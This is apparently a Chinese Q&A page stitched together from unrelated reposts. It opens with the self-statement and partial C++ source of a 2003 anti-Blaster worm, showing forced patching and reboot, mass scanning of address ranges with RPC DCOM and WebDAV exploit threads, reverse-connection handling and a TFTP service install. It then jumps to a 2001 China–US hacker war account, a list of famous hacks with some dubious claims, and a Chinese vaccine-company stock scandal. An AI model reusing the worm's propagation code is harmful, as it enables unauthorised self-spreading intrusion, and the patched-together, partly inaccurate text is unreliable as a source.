《冲击波杀手》那个黑客是谁?
这个问题警察也想知道 也没人在网上公布
给您转一篇文章 也许对您有用
冲击波杀手的作者网上现身
前言:“冲击波”蠕虫爆发后,大量个人主机及服务器遭受侵袭,各大安全公司,杀毒厂商纷纷推出各种解决方案,不料短短几日内,又出现了来历不明的新蠕虫,经过一些安全专家的反向编译和分析,惊讶的发现,该蠕虫的工作目标居然是消灭冲击波蠕虫并自动为受害主机进行补丁,而且该蠕虫还具有定时自毁功能,显然作者的目标还是有一定的善意因素,但是蠕虫毕竟是蠕虫,因为大量icmp包的发送,还是能够给企业局域网络带来极大的压力,就此,对蠕虫的危害性依然要保持极大的关注和警惕,相关文章可以参见
http://www.donews.com/donews/article/5/50423.html
8月20日,蠕虫作者突然现身,出现在某安全论坛,以下是该作者论坛上声明的转载,并公开了源代码。
下文为作者自述-转自某安全论坛
玩过了~~ 虫虫四个小时之内已经完成了任务~~~ 不得不写这豆腐块~~~
char *szMe = "=========== I love my wife baby ~~~ Welcome Chian~~~
Notice: 2004 will remove myself~~ sorry zhongli~~~=========== wins";
偶:小地方小公司小小程序员
偶从不玩安全的,临时抱佛脚,看了些资料,仓促写了这个烂虫虫~~~
A 看不惯老外小鸟儿写的什么什么波的烂虫~~ ,虽然偶临时玩安全的即兴之作亦很烂
~~~
B 看不惯国内某几家放毒公司的商业炒作,发网难财,违背良心,误导民众
偶就帮你丫的除光了虫虫,打光了补丁,没想到他丫的误导的更变态~~~ 你丫的方脑壳
~~
C 帮偶不认识的 flashsky 兄解脱些吧~~~ 他丫的 Bill该死,快去谢flashsky~~~
D VirusBOy 兄,baby 可不是情人吆,偶家小子两岁就开始跟偶抢机器了~~
E 长了这么大,算首次报效社会吧~~~
F 几年?进去就是了,不就是个坐吗, 切~~~ 偶是吓大的!
======================================================
0 chian 系 china 笔误~~ 敲的快了,某个指头先到~~~
1 早在 8/13 国际国内骨干路由就丢弃了 135 syn ,只有加入WebDav才玩得转~~~
2 RpcDcom WebDav 使用同一 反向shellcode, 用 eyas的, lion修改
(声明:谁也没给偶,偶从一被人遗忘的公开程序中sniffer的,谢两位)
此shellcode 新进程建在svchost下,就一个Call Ebx 通杀了 all 2k xp
他丫的,还有放毒公司言导致xp机器重启云云的~~~
3 Bill该死 有 Tftpd.exe, 干吗不用,虽然偶看过 Tftp 协议,练习写过~~~
4 某年某月某日某时某刻,
溜出国门,辗转借了几台 Xeon™ 4 cpus, 2g memory 机器
架起 2000 线程的 WebDav 投放玩具,对准某国骨干的几个B段
10 分钟内投放了三四百个种子(早知道有这么多,就换个玩法 ~~~
5 发icmp包是为了提高搜索效率,算唯一的危害了~~~ 刺激一下也好~~~
打补丁的虫,杀虫的虫,再不有点儿小危害就丢尽了虫虫家族的脸~~~
//偶婆婆, 烂代码~~~ 将就看吧~~~
BOOL DoServicePackFunction()
{
DWORD nSystemVer = Win2000OrXp();
if ( !( nSystemVer == 0 || nSystemVer == 1) )
return FALSE; // not 2k or xp
if ( ReadRegServicePack(nSystemVer) )
return FALSE; //已经安装了
//识别语言版本
int nLanguageID;
unsigned int unOemCP = GetOEMCP();
LCID lcid = GetSystemDefaultLCID();
WORD wMain = PRIMARYLANGID(lcid);
WORD wSub = SUBLANGID(lcid);
if ( unOemCP == 437 wMain == 9 wSub == 1 ) //en
nLanguageID = 0; //打了你丫的en补丁就不错了~~ 还唧唧歪歪的~~
//管不了小欧洲~~ 俄罗斯牛人有自己的玩法
~~
else if ( unOemCP == 936 wMain == 4 wSub == 2 ) //cn
nLanguageID = 1; //就是为这个来的~~
else if ( unOemCP == 950 wMain == 4 wSub == 1 ) //tw
nLanguageID = 2; //同胞骨肉的忙,一定要帮~~
else if ( unOemCP == 932 wMain == 0x11 wSub == 1 ) //jp
nLanguageID = -1; //偶好有干掉鬼子机器的冲动!
//罢了,冤冤相报何时了~~~ 希望他丫的自新
~~~ 再玩火就灭了他丫的~~
else if ( unOemCP == 949 wMain == 0x12 wSub == 1 ) //kr
nLanguageID = 3; //少些不懂事的小鸟儿弯出去, 危害国内~~
else{
nLanguageID = -1;
}
if ( nLanguageID == -1)
return FALSE;
char szServicePack[] = "RpcServicePack.exe";
// downlaod it~~~
if ( !nSystemVer ) { // 2k
if ( !DownloadSpFile (szServicePack, szWin2kSpUrl[nLanguageID]) )
return FALSE;
}
else{
if ( !DownloadSpFile (szServicePack, szWinXPSpUrl[nLanguageID]) )
return FALSE;
}
char szExec[180];
sprintf(szExec, "%s -n -o -z -q", szServicePack);
HANDLE hProcess = MakeProcess( szExec );
if ( hProcess == NULL )
return FALSE;
if (WaitForSingleObject(hProcess, 360000) != WAIT_OBJECT_0 ){ //六分钟内
未完成
TerminateProcess(hProcess,1);
CloseHandle(hProcess);
DeleteFile(szServicePack);
return FALSE;
}
CloseHandle(hProcess);
Sleep(15000);
DeleteFile(szServicePack);
if ( ReadRegServicePack(nSystemVer) ) {
ShutDownWindows( EWX_REBOOT | EWX_FORCE );//install service pack ok, reboot
it~~~
Sleep(20000); //说偶重启有过? 不重启补丁无效,
找 Bill该死 说去~~~
}
return TRUE;
}
// IN: 始ip, B段数量, 是否随机,是否换WebDav //更烂~~~ 凑合着看~~~
void BeginExploitFunction(u_long ulIpStart, int nBCount, BOOL bRand, BOOL
bWebDav)
{
HANDLE hThread = NULL;
BOOL bFirst = TRUE;
u_long uComp;
for (int i=0;i (nBCount * 256 * 256); i++){
if ( bRand )
uComp = MakeRandIp();
else
uComp = i + ulIpStart;
if ( //还是屏蔽掉部分目标,免得目标中招后,再玩就把下一代干掉了,不破坏的好
~~~
(BYTE)uComp == 0xc5 ||
(BYTE)(uComp8) == 0xc5 ||
(BYTE)(uComp16) == 0xc5 ||
(BYTE)(uComp24) == 0xc5 ||
(WORD)uComp == 0x9999 ||
(WORD)(uComp8) == 0x9999 ||
(WORD)(uComp16) == 0x9999 )
continue;
u_long *myPara = new u_long;
if ( myPara == NULL ){//如果分配失败,再尝试一次
Sleep(100);
myPara = new u_long;
}
if ( myPara ){
if ( hThread )
CloseHandle(hThread);
*myPara = htonl( uComp);
DWORD dwThreadId;
if (bWebDav)
hThread =
CreateThread(NULL,0,ExploitWebDavThread,(LPVOID)myPara,0,dwThreadId);
else
hThread =
CreateThread(NULL,0,ExploitRpcDcomThread,(LPVOID)myPara,0,dwThreadId);
Sleep(2);
}
//添加此处代码,避免首次执行时,线程中的
InterlockedIncrement(g_CurThreadCount) 未来得及运行,一次性建立了N个线程的
bug!
if ( bFirst (i = nMaxThread) ){
Sleep(2000);
bFirst = FALSE;
}
while(g_CurThreadCount = nMaxThread) // #define nMaxThread 300 ,不小心,
玩过了~~~
Sleep(2);
}
Sleep(60000);
}
//服务模式和控制台模式公用主程序
void DoIt()
{
WSADATAwsd;
if(WSAStartup(MAKEWORD(2,2),wsd)!=0)
return;
//杀蠕虫
KillMsblast();
//卸载
SYSTEMTIME st;
GetLocalTime(st);
if ( st.wYear == 2004 ){
MyDeleteService(szServiceName);
MyDeleteService(szServiceTftpd);
RemoveMe();
ExitProcess(1); //其实不必,RemoveMe()中借用了前辈的代码,2k下,退出程序时将
自身文件删除了
}
srand( GetTickCount() );
memset(pPingBuffer, '\xAA', sizeof(pPingBuffer));
//烦请骨干路由器立即丢弃此特征 Icmp Echo 包! 国内的什么什么波已经绝了!~~ 补
丁已经打够了!~~~
//准备WebDav发送缓冲区
do{
pWebDavExploitBuffer = new char[68000];
Sleep(100);
}while(pWebDavExploitBuffer == NULL);
//必须在checkonlien 之前,一次装配好子弹
PressWebDavBufferOnce();
PressRpcDcomBufferOnce();
CheckOnlienAndPressData(); //get LocalIp 修正子弹中的反向ip 和 端口
//打补丁
DoServicePackFunction();
//建立接收线程
DWORD dwThreadID;
HANDLE
hWorkThread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)RecvSendCmdThread,(L
PVOID)NULL,0,dwThreadID);
if(hWorkThread==NULL) // RecvSendCmdThread 中阻塞,有反连,再建线程处理之,
同时处理多个反连
return;
CloseHandle(hWorkThread);
if ( !MyStartService(szServiceTftpd) ){
Sleep(1000);
InstallTftpService();
Sleep(1000);
MyStartService(szServiceTftpd);
}
Sleep(2000); //等待接收线程中的全局 rand bind port
u_long ulIP;
for(;{ //估算了一下,普通机器2小时一循环
//首先扫描本ip段
CheckOnlienAndPressData();
ulIP = ntohl(inet_addr(szLocalIp));
ulIP = 0xffff0000;
BeginExploitFunction( ulIP, 1, 0, 0);
//再扫描本ip前后3个段
CheckOnlienAndPressData();
if ( rand() % 2)
ulIP += 0x00010000;
else
ulIP -= 0x00030000;
BeginExploitFunction( ulIP, 3, 0, 0);
//再扫描WebDav一个段,跳出 135 syn封锁
CheckOnlienAndPressData();
ulIP = MAKELONG(0, wdIpHead[ rand()% 76 ]); //请 wdIpHead[] B段IP商注意~~~,
立即采取补救措施~~~ sorry~~~
BeginExploitFunction( ulIP, 1, 0, 1);
//再扫描随机的IP, 数量1个 B段, rpc or webdav
CheckOnlienAndPressData();
if ( rand() % 2)
BeginExploitFunction( ulIP, 1, 1, 0);
else
BeginExploitFunction( ulIP, 1, 1, 1); //偶跳、跳、跳~~~
KillMsblast();
}
//WSACleanup();
}
--------------------------------------------------------------------------------------------------
为方便阅读,增加几个补充说明
1.flashsky www.xfocus.net创始人之一,启明星辰安全专家,擅长古体诗词,7月中公开rpc漏洞利用方式源代码,公开溢出分析报告,造成全球安全领域的震动,冲击波蠕虫的主要传播技术来源于这位高手公开的技术描述。
2.VirusBOy 懂点安全的小朋友,水平不咋地,不过你最好别招惹他,DDOS你一把也够受的。
3.某安全公司安全专家评论,该帖子内容基本属实,蠕虫源代码已经得到确认。
瑞星反病毒检测中心今晚再次截获利用微软RPC漏洞进行传播的病毒。不过,这个新病毒生来就是原冲击波病毒的克星。
瑞星反病毒工程师分析说:该病毒的特点是将“冲击波”(Worm.Blaster)病毒干掉,并在系统内值入,预防冲击波病毒的疫苗。
然后这个新病毒会尝试从微软网站下载补丁并自动将受感染的系统打上补丁。然后该病毒会开启数百个的线程PING其它IP地址,并通过RPC漏洞快速传播自己,消耗大量CPU和网络资源,并且有可能会导致系统死机。该病毒的作者似乎无意作恶,病毒设定在2004年自行毁灭。
由于该病毒采用PING方式进行探测,只感染能够PING通的机器,因此瑞星反病毒工程师提醒广大用户,设置防火墙的规则,禁止ping,这样可以有效防止该病毒的入侵。
2001年5月那场轰动全球的中美黑客大战是什么回事?
2001年04月01日,美国一架海军EP-3侦察机在中国海南岛东南海域上空活动,中方两架军用飞机对其进行跟踪监视。北京时间上午9时07分,当中方飞机在海南岛东南104公里处正常飞行时, 美机突然向中方飞机转向,其机头和左翼与中方一架飞机相撞,致使中方飞机坠毁,飞行员失踪。
4月1日,浙江湖州籍优秀飞行员王伟,以自己的青春和生命,捍卫了国家的主权和民族的尊严,在万里碧海蓝天,写下了当代军人对祖国的忠诚。
中美撞机事件发生后,中美黑客之间发生的网络大战愈演愈烈。自4月4日以来,美国黑客组织PoizonBOx不断袭击中国网站。对此,我国的网络安全人员积极防备美方黑客的攻击。中国一些黑客组织则在“五一”期间打响了“黑客反击战”!
自4月1日发生撞机事件以来,多个美国政府和商业网站遭到了中国黑客的攻击。一张贴在被黑网站首页上的帖子写着:“黑倒美国!为我们的飞行员王伟!为了我们的中国!”。
美国一家著名的网络安全公司宣布了一项调查数据,称自从撞机事件发生以来,两国网站上的黑客攻击事件每天都要发生40—50起,而在这之前,这个数字仅为1—2起。
其实中美黑客间大规模的攻击事件,最早可以追溯到1999年5月,即美国轰炸中国驻南联盟大使馆事件发生以后,当时中国的红客们袭击了美国的一些政府网站,包括能源部、内政部在内,这些网站的首页上一度高高飘扬着五星红旗。有一次大规模的攻击,还致使白宫的网站失灵三天。中国黑客攻击事件成了当时美国各大报纸的头条新闻。
同样在4月27日这天,中国ChinaByte网站专门刊文,提醒中国的网络管理员,近期屡屡得手的美国黑客组织PoizonBOx和单枪匹马的Pr0phet,前者侧重攻击windows,后者主要攻击Lunix系统,虽然他们“闹翻天了也不过是个小角色而已”,但得重视才对,因为自3月以来,PoizonBOx对以“.cn”结尾的部分网站进行了283次的攻击,而pr0phet也已得手了近30次。其中绝大多数是在最近的两周进行的。
5月3日,中国国家计算机网络与信息安全管理工作办公室负责人在接受新华社记者专访时说,进入4月中旬以来,针对中国网络的攻击事件频繁发生,中国网络运营者要注意防范黑客攻击,确保网络安全。并提醒,如果发现网络攻击事件,可以将有关情况上报国家计算机网络应急处理协调中心。
撞机事件的谈判仍在继续,而网上的斗争却已然火热。一场规模更大、牵涉面更广的黑客战争,再次逾越浩渺的太平洋,在网络上展开。
著名的黑客事件都有哪些
The Daily Beast下面列出了在过去25年间十大最著名的黑客攻击、蠕虫攻击以及分布式拒绝服务攻击(DDoS)事件:
1、1988年11月:罗伯特·塔潘·莫里斯 对阵 全球
罗伯特·塔潘·莫里斯(Robert Tappan Morris)1988年成为康奈尔大学(Cornell University)的研究生,他研制出一种自我复制的蠕虫,并赋予它使命:确定互联网的规模(go out to determine the size of the internet)。事与愿违,蠕虫的复制无法控制,它感染了数千台电脑,造成了数百万美元的损失,并促使美国政府针对电脑创建了应急响应(create a emergency response for computers)。
由于意外的失误,莫里斯最终被指控违反计算机欺诈与滥用法案(Computer Fraud Abuse Act),被判处1万美元罚金,及400小时社区服务。莫里斯的源代码存放于一个黑色3.5英寸软盘中,在波士顿科学博物馆(Boston Museum of Science)中进行展示。
2、2009年7月:不知名 对阵 美国和韩国
在2009年7月的3天中,韩国大量日报、大型在线拍卖厂商、银行和韩国总统的网站 ,以及白宫和五角大楼的网站受到分布式拒绝服务的多轮攻击,逾16.6万台电脑受到影响。部分人士认为,朝鲜无线通讯部门利用Mydoom蠕虫病毒的后门,进行了这次攻击。但这一消息并未得到证实。
3、1999年3月:大卫·史密斯 对阵 微软Word Excel
大卫·史密斯(David L. Smith)在1999年发布了一个计算机病毒。史密斯使用被盗的美国在线账号,向美国在线讨论组Alt.Sex发布了一个感染Melissa病毒的Word文档。史密斯的病毒通过电子邮件传播,使得被感染电脑的邮件过载,导致像微软、英特尔、Lockheed Martin和Lucent Technologies等公司关闭了电邮网络。
这一事件造成8000万美元损失。由于释放病毒,史密斯面临10年监禁和5000美元罚金,史密斯最终仅服刑20个月。
4、2009年8月 俄罗斯 对阵 博客主Cyxymu
由于俄罗斯黑客进行的分布式拒绝服务攻击,拥有数亿用户的社交网站在2009年夏天经历了数小时的拥堵和中断服务,黑客声称其目的是为了让博客主Cyxymu禁声。Facebook安全主管马克斯.凯利(Max Kelly)表示,这是针对Cyxymu通过多种方式同时进行攻击,以使别人不能跟他联系。
5、1999年8月:乔纳森·詹姆斯 对阵 美国国防部
乔纳森·詹姆斯(Jonathan James)是历史上最著名的电脑黑客,他在1999年入侵美国国防威胁降低局(Defense Threat Reduction Agency)的军用电脑,并获取了数千份机密信息、注册信息,以及控制国际空间站上生活环境的价值170万美元软件。
入侵被发现后,美国国家航空与宇宙航行局关闭了网络,并花费数千美元进行安全升级。詹姆斯在2007年自杀。
6、2008年11月 无名人士 对阵 微软Windows
自2008年末,Conficker蠕虫病毒利用了微软操作系统中的大量漏洞。Conficker蠕虫病毒一旦控制被感染机器,它将大量电脑连接成可由病毒创造者控制的一个大型僵尸网络。自从首次被发现,Conficker蠕虫病毒已经感染了全球数百万电脑和商业网络。
7、2000年2月 黑手党男孩 对阵 雅虎、CNN、eBay、戴尔和亚马逊
15岁的迈克尔·凯尔(Michael Calce)-黑手党男孩(Mafiaboy)在2000年2月利用分布式拒绝服务攻击了雅虎,并随后攻击了CNN、eBay、戴尔和亚马逊等公司的服务器。凯尔被加拿大警方逮捕,面临3年监禁,凯尔最终被判处在青少年拘留中心(juvenile detention center)8个月的监禁,并交纳250美元捐款。
8、2008年1月:匿名 对阵 山达基教
黑客利用分布式拒绝服务针对山达基教(Church of Scientology)的Scientology.org站点进行了攻击。黑客攻击的目的是:通过反向洗脑,来将民众从山达基教中解救出来。安全专家根据对分布式攻击所派生的流量监测认为,攻击为中等规模攻击。安全专家指出,攻击并非是一或者二个人所为。
9、2002年2月:艾德里安.拉莫 对阵《纽约时报》
在此之前,无家可归的黑客-艾德里安.拉莫(Adrian Lamo)因从Kinko连锁店和星巴克咖啡馆攻击《纽约时报》等公司的服务器而名声大振。2002年2月拉莫入侵Grey Lady数据库,在一列Op-Ed投稿人中添加了自己的名字,并在Lexis-Nexis中搜索自己。
联邦调查局表示,Lexis-Nexis搜索共造成《纽约时报》30万美元损失,拉莫也面临15年监禁。拉莫最终被判缓刑2年,以家拘禁6个月,并处以6.5万美元罚金。
10、1990年6月:凯文·鲍尔森 对阵 洛杉矶KIIS FM电台
凯文·鲍尔森(Kevin Poulsen)是一位青年电话黑客。为了成为洛杉矶KIIS FM电台“周五赢辆保时捷”(Win a Porsche By Friday)节目的第102位获胜呼入者,鲍尔森攻击了电话线路。在随后几个月中,鲍尔森还对一位好莱坞女明星的电话进行窃听,并攻击了军队及美国联邦调查局的电话。
联邦调查局指控鲍尔森犯有系列诈骗及洗钱罪。鲍尔森被判入狱51个月,并被判为损坏的广播站支付5.6万美元罚金。鲍尔森同时被判三年禁止接触电脑。鲍尔森现在是连线杂志的记者,他还运营着博客Threat Level blog。Threat Level blog在今年6月6日首先报道了美国陆军情报分析员布拉德利·曼宁(Bradley Manning)是维基解密消息源的消息。
Vladimir Levin--这位数学家领导了俄罗斯骇客组织诈骗花旗银行向其分发1000万美元。
Steve Wozniak--苹果电脑创办人之一。
Tsotumu Shimomura--于1994年攻破了当时最著名黑客Steve Wozniak的银行帐户。
Linus Torvalds--他于1991年开发了著名的Linux内核,当时他是芬兰赫尔辛基大学电脑系学生。
Johan Helsingius--黑尔森尤斯于1996年关闭自己的小商店後开发出了世界上最流行的,被称为“penet.fi"的匿名回函程序,他的麻烦从此开始接踵而至。其中最悲惨的就是sceintology教堂抱怨一个penet.fi用户在网上张贴教堂的秘密後芬兰警方在1995年对他进行了搜查,後来他封存了这个回函程序。
Tsutomu Shimomura--能记起他是因为抓了米特尼克。
Eric Raymond--Eric Raymond就一直活跃在计算机界,从事各种各样的计算机系统开发工作。同时,Eric Raymond更热衷于自由软件的开发与推广,并撰写文章、发表演说,积极推动自由软件运动的发展,为自由软件作出了巨大贡献。他写的《大教堂和市集》等文章,是自由软件界的经典美文,网景公司就是在这篇文章的影响下决定开放他们的源代码,使浏览器成为了自由软件大家族中的重要一员.
否认中国威胁美国疫苗,是否表示美国认可中国了?
是的,中美民间关系积极向好,科学无国界,彼此也承认对方的技术水平和工作能力。
长生生物会被强制退市吗 长生生物退市的股票
7月24晚间,上市公司长生生物发布公告称将从7月16日起被实施其他风险警示,股票简称由长生生物更为“ST长生”,公司股票交易日涨跌幅限制在5%。
根据长生生物的公告,目前长春长生停止狂犬病疫苗生产及销售。子公司所有产品已被暂停批签发。除了百白破联合疫苗、冻干人用狂犬病疫苗产品责令停产外,公司经研究决定对公司其他产品也采取全面自主停产,以上生产车间在停产期间自查自纠,进行全面、彻底的整改。目前复产时间不确定。
长生生物称,全面停产将对长生生物业绩产生重大负面影响。
7月24日,既公司被立案调查后,长春长生生物科技有限责任公司高某芳等15名涉案人员被刑事拘留。长生生物“疫苗事件”不断发酵,引发最高层批示,长生生物也已经遭遇7个跌停,自“疫苗事件”曝出至今,长生生物市值已经蒸发124亿元。且跌停仍在继续。
长生生物日前引发基金纷纷下调估值。目前在下调估值的机构中,东方基金下调的估值最低,下调至3.96元。东方基金3.96元的估值意味着长生生物还将面临10个跌停板。值得注意的是,基金公司的估值调整只是暂时调整,如果情况发生变化,基金公司或将重新调整估值。
长生生物距离退市有多远?
高俊芳儿子张洺豪:该退市退市
最高层批示、公司停产、责任人被刑事拘留、股票跌停板数量不断刷新,长生生物距离退市有多远?
“长生生物有可能退市,重大违法违纪触发退市。”一位市场人士说。
财经评论人士皮海洲认为,从2014年起,A股推出了强制退市制度。但该项退市制度,主要是对欺诈发行及重大信息披露违法公司进行强制退市。实际上,长生生物在狂犬疫苗上面严重造假,其性质比欺诈发行严重得多。毕竟欺诈发行只是谋财,但在狂犬疫苗上面严重造假,这不仅是谋财,而且还是害命,这样的公司应坚决将其退市。但奇怪的是,A股市场还不能以此为由直接将其退市。
如今,市场把长生生物强制退市的希望寄托在证监会对长生生物涉嫌信息披露违法违规问题的立案调查上,这其实是一种本末倒置。毕竟即便长生生物信息披露违法违规,这也不构成杀人罪,但在狂犬疫苗问题上严重造假,这是直接的谋财害命。二者性质孰轻孰重是显而易见的。
而在财经评论人士朱邦凌看来,长生生物被强制退市的可能性不小。
其一,长生生物长春长生在冻干人用狂犬病疫苗生产过程中存在记录造假,这个造假行为本身就是重要的信息披露违法违规;其二,去年曾生产劣质儿童疫苗,但公司年报未披露,也涉嫌信息披露违法违规;其三,长春长生涉及多起行贿,通过行贿地方医院、疾病防疫部门,给予回扣方式推销其产品,这种行为可能涉嫌构成重大违法;其四,媒体报道长生生物借助阴阳合同上市,那么长生生物可能涉嫌业绩造假、欺诈上市。
对于退市,长生生物在7月23日就表示,公司股票可能存在被实施退市风险警示、暂停上市或终止上市的风险。
对于“疫苗事件”对公司的影响,高俊芳的儿子、长生生物副董事长张洺豪独家回应新京报理财帮(ID:banglicai)时说:“(对公司的严重后果是)没了,那还有啥?该退市退市。”他说,现在公司整体处于停产状态。
富国基金、质押方兴业证券等悲催踩雷
“如果退市,持有其股份的投资者、基金和券商可能会面临巨大的损失。但是否给予退市的处罚,处罚的程度要看监管层的意见和决定,无法进行预测。” 前海开源基金董事总经理杨德龙说。
从踩雷基金来看,截止今年一季度,11只公募基金持仓长生生物,持有数量占流通股比例为2.3%。
其中,富国天瑞强势地区精选混合型证券投资基金持仓数量最多,共计持有862.01万股。长生生物同时也是该基金的第5大重仓股,占净值比达到了4.38%。同花顺数据提供的机构成本(估算)为17.08元。
此外,华泰柏瑞价值增长混合型证券投资基金、华泰柏瑞消费成长灵活配置混合型证券投资基金分别持有65万、30万股,位列2、3位。分别为第6大重仓股和第10大重仓股,占净值比分别为2.25%、1.80%。
悲催踩雷的还有质押方兴业证券和平安证券,兴业证券持有长生生物1.7亿质押股份,目前来看隐患颇大。
随着股价不断下跌,长生生物大股东、控股股东的质押股份面临平仓风险。中登公司公布的数据显示,长生生物股权被质押了28%,其中大部分质押方为兴业证券。
比如,长生生物副董事长张洺豪(董事长高俊芳之子),持有长生生物1.74亿股,占公司总股本的17.88%。包括7月23日补充质押的7336万股,目前其已累计质押1.67亿股,占其所持股份的95.86%,质押方均为兴业证券。
除了兴业证券,平安证券也持有部分长生生物质押股份。长生生物大股东,芜湖卓瑞创新投资管理中心(有限合伙),也在去年5月份,向平安证券质押了4943万股股份,质押期为两年。
有市场人士分析认为,按照质押日收盘价14.5元计算,预估此次补充质押的平仓线约在7元,长生生物预计4个跌停后,质押股份有平仓风险,张洺豪需要补充质押,不过目前的情况是,张洺豪95.86%的股份已经质押。
值得注意的是,为了防止长生生物董监高卖出股票,深交所已经启动了限售机制。查看细则意味着,在调查期间,高俊芳家族向证券公司质押的股权即使发生爆仓情况,证券公司也无法在二级市场卖出,只能寻求其他途径。
评论
长生生物因重大违法强制退市的可能性有多大?
财经评论人:朱邦凌
长生生物造假事件不断发酵。在高层做出批示和派驻调查组后,长生生物已经成了“疫苗界三聚氰胺”,陷入了全民舆论漩涡。甚至长生科技官网也被黑客攻击,并配图“不搞你,对不起祖国的花朵”。
其中关键的是,长生生物收到证监会调查通知书,公司因涉嫌信息披露违法违规被立案调查。如果公司被监管部门最终认定存在重大违法行为或移送公安机关,根据《深圳证券交易所股票上市规则》的有关规定,公司股票可能存在被实施退市风险警示、暂停上市或终止上市的风险。
那么,长生生物在被监管部门立案调查后有没有退市可能?长生生物会否因重大违法强制退市?应该说这种退市可能性还是存在的,甚至可能性还不小。公告说,公司因涉嫌信息披露违法违规被立案调查,那么长生生物目前涉嫌哪些信息披露违法违规行为呢?
其一,长春长生在冻干人用狂犬病疫苗生产过程中存在记录造假,这个造假行为本身就是重要的信息披露违法违规。
《证券法》涉及信息披露规范的主要是第63条和第193条。这些规定要求:发行人、上市公司依法披露的信息,必须真实、准确、完整,不得有虚假记载、误导性陈述或者重大遗漏。可见,证券法上的信息披露违法主要包括三大类:虚假记载、误导性陈述和重大遗漏。信息披露违法的表现形式实在太多了,种类和类别也各不相同。
长春长生疫苗生产过程中存在记录造假,就涉嫌“虚假记载”。7月15日,国家药监局发布通告,称在飞行检查发现吉林长春长生生物科技有限责任公司冻干人用狂犬病疫苗生产存在记录造假,严重违反相关规定。这个事实,恐怕就是长生生物信息披露违法违规中“虚假记载”的主要依据。
其二,去年曾生产劣质儿童疫苗,但公司年报未披露,也涉嫌信息披露违法违规。
2017年11月,原国家食药监总局通报,长生生物25.26万支百白破疫苗“效价指标不符合标准”,要求立即停止使用不合格产品,责令上报2批次不合格疫苗出厂检验结果。“效价指标不符合标准”,即疫苗没有免疫效果。 长生生物随即公告,虽然百白破疫苗可能影响免疫效果,但对人体安全性没有影响;“问题疫苗销售收入只占83万元,对生产经营毫无影响”。
根据长生生物的公告,在被查之前该批次约25万支疫苗几乎已全部销售到山东省疾病预防控制中心。在2015年年报中,公司百白破批签发量约562万人份,位列公司在售6种疫苗产品之首,足见其重要性。公司在2016年、2017年年报中仍称,长春长生目前在售产品包括吸附无细胞百白破联合疫苗等。然而,2016年和2017年年报中,百白破这一重要疫苗产品的批签发量却没有披露。另一个变化是,百白破也消失在近两年的在售产品图片列表中。直至近日,一纸行政处罚书揭开了百白破消失的秘密。然而,随着立案调查时间的曝光,围绕百白破的更多疑团随之而来:百白破究竟是何时被检验出不合规的?百白破生产车间又是何时停产?作为公司六大疫苗产品之一,百白破停产为何没有对长生生物近两年业绩带来波动?去年10月至今,长生生物为何一直对此秘而不宣?上市公司是否涉嫌信披违规,值得追问。
其三,长春长生涉及多起行贿,通过行贿地方医院、疾病防疫部门,给予回扣方式推销其产品,这种行为是否涉嫌构成重大违法行为?
2017年,长生生物的推广服务费为4.42亿元,相比2016年翻倍。然而,在疫苗销售的过程中,长生生物(长春长生)员工、经销商卷入到了多起刑事案件中。他们通过行贿有采购权限的相关部门,给予有关人员回扣的方式推销疫苗产品。
据第三方软件统计,涉及长生生物的法律文书中,“贪污贿赂”类案件最多,为20例。自2010年以来,长春长生销售人员已涉及多起向地方医院、疾病防疫部门负责人行贿的案件。据中国裁判文书网显示,涉及长春长生的司法裁定书中,10余起均是通过回扣的方式行贿,所涉及的疫苗则包括狂犬、水痘、乙肝、流感等多种;其中,72元/支的冻干狂犬病疫苗其回扣额高达20元/支。
其四,媒体报道长生生物借助阴阳合同上市,那么长生生物是否涉嫌业绩造假、欺诈上市?
山东兆信生物科技有限公司与长生生物有一起4000多万元纠纷,它曾是长生生物在2015年的第一大经销商。山东兆信一名已经离职人士透露,这起案件的数据山东兆信并不认可,“他(长生生物)上市时山东兆信做配合,做假数据。由此产生阴阳合同,做报表的时候几家公司配合长生生物助力其上市。”
今年3月,沪深交易所对重大违法强制退市制度进行了细化和明确,明确了上市公司因重大违法暂停上市、终止上市的标准、程序等事项,严格执行重大违法强制退市制度。对重大违法行为全方位覆盖,不姑息、不迁就,着力维护市场健康秩序。今年以来,沪深交易所已有5家上市公司确定退市。预计未来常规退市和强制退市将成为A股市场常态。
中美黑客大战是怎么一回事
中国北京时间5月9日消息,近日与美国黑客展开“网络大战”的中国黑客5月9日表示他们已将1000家美国网站的页面进行了修改,不过中国黑客主动呼吁结束这场“网络战争”,与美国黑客“停战”。 中国“红客联盟”在网站上发表声明称,该组织已攻击了1000家美国网站,他们的目标已经实现。声明称:“从现在开始再发生的黑客攻击事件将与红客联盟无关。” 自4月1日美国侦察机撞毁中方军机事件发生后,美国黑客向中国网站发动了进攻,数百家中国网站遭到入侵,美国黑客还在这些网站上留下了攻击中国的语句。由中国黑客组成的非正式黑客组织“中国红客联盟”于5月1日宣布将向美国网站发动反击。 随着双方网络大战的开始,更多的美国和中国网站都遭到了攻击,其中一些网站不得不暂时停止运营。在这期间,两家负责纪录网站被攻击情况的国际性安全公司表示,自4月1日以来有近千家以“.cn”结尾的网站遭到了入侵。同时,至少十几家非常知名的美国网站也遭到了显然是来自中国的黑客的攻击,这些黑客在美国网站上留下话称:“禁止向台湾出售武器,台湾是中国不可分割的一部分。” 位于北京的网络安全公司管理人员表示,除非网络管理员时刻注意增强服务器的安全防范能力,否则很多网站都极容易遭到黑客攻击。该管理人员说,大多数黑客攻击均是通过一系列防范能力不强的服务器作为跳板完成的。 中国红客联盟也在声明中呼吁增强中国网站的安全性,并表示遭到美国黑客入侵的中国网站大多是小型网站。声明称:“网络大战的有利之处在于使中国网站注意到了网络安全的重要性,现在越来越多的网站会认真对待网络安全问题。”摘自新浪